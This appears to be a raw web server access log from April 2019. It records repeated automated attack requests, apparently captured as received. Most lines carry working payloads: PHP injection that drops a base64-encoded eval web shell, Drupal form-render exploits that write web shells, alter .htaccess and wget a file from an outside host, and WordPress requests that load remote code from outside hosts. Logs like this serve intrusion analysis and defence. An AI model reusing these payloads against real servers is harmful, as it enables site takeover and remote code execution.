2019-04-02T17:04:56+02:00 GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1
2019-04-02T17:05:05+02:00 GET //webconfig.txt.php HTTP/1.1
2019-04-02T17:05:08+02:00 GET /?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=echo+%27Vuln%21%21+patch+it+Now%21%27+%3E+vuln.htm%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+sites%2Fdefault%2Ffiles%2Fvuln.php%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+vuln.php%3B+cd+sites%2Fdefault%2Ffiles%2F%3B+echo+%27AddType+application%2Fx-httpd-php+.jpg%27+%3E+.htaccess%3B+wget+%27http%3A%2F%2F40k.waszmann.de%2FDeutsch%2Fimages%2Fup.php%27 HTTP/1.1
2019-04-02T17:05:12+02:00 GET /shop HTTP/1.1
2019-04-02T17:05:27+02:00 GET //user/register/?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
2019-04-02T17:05:51+02:00 GET //wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://netlabs.gr//images/code.txt&wpaa=phpinfo();exit(); HTTP/1.1
2019-04-02T17:06:04+02:00 GET //wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://www.viamarkt.hu/readme.txt&wpaa=phpinfo();exit(); HTTP/1.1
2019-04-02T17:06:14+02:00 GET //administrator/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1
2019-04-02T17:06:23+02:00 GET //administrator//webconfig.txt.php HTTP/1.1
2019-04-02T17:06:33+02:00 GET ///webconfig.txt.php HTTP/1.1
2019-04-02T17:06:37+02:00 GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1
2019-04-02T17:06:42+02:00 GET //webconfig.txt.php HTTP/1.1
2019-04-02T17:06:49+02:00 POST /?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=echo+%27Vuln%21%21+patch+it+Now%21%27+%3E+vuln.htm%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+sites%2Fdefault%2Ffiles%2Fvuln.php%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+vuln.php%3B+cd+sites%2Fdefault%2Ffiles%2F%3B+echo+%27AddType+application%2Fx-httpd-php+.jpg%27+%3E+.htaccess%3B+wget+%27http%3A%2F%2F40k.waszmann.de%2FDeutsch%2Fimages%2Fup.php%27 HTTP/1.1
2019-04-02T17:06:49+02:00 GET /shop HTTP/1.1
2019-04-02T17:06:52+02:00 POST //user/register/?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
2019-04-02T17:06:56+02:00 POST //wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://netlabs.gr//images/code.txt&wpaa=phpinfo();exit(); HTTP/1.1
2019-04-02T17:07:01+02:00 POST //wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://www.viamarkt.hu/readme.txt&wpaa=phpinfo();exit(); HTTP/1.1
2019-04-02T17:07:03+02:00 GET //administrator/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1
2019-04-02T17:07:06+02:00 GET //administrator//webconfig.txt.php HTTP/1.1
2019-04-02T17:07:12+02:00 GET ///webconfig.txt.php HTTP/1.1
2019-04-02T17:07:42+02:00 GET //webconfig.txt.php HTTP/1.1
2019-04-02T17:07:52+02:00 GET //user/register/?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
2019-04-02T17:08:40+02:00 GET //administrator//webconfig.txt.php HTTP/1.1
2019-04-02T17:08:44+02:00 GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1
2019-04-02T17:08:47+02:00 GET ///webconfig.txt.php HTTP/1.1
2019-04-02T17:08:52+02:00 GET //webconfig.txt.php HTTP/1.1
2019-04-02T17:08:55+02:00 GET //webconfig.txt.php HTTP/1.1
2019-04-02T17:08:58+02:00 GET /?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=echo+%27Vuln%21%21+patch+it+Now%21%27+%3E+vuln.htm%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+sites%2Fdefault%2Ffiles%2Fvuln.php%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+vuln.php%3B+cd+sites%2Fdefault%2Ffiles%2F%3B+echo+%27AddType+application%2Fx-httpd-php+.jpg%27+%3E+.htaccess%3B+wget+%27http%3A%2F%2F40k.waszmann.de%2FDeutsch%2Fimages%2Fup.php%27 HTTP/1.1
2019-04-02T17:08:59+02:00 POST //user/register/?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
2019-04-02T17:09:00+02:00 GET /shop HTTP/1.1
2019-04-02T17:09:04+02:00 GET //user/register/?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1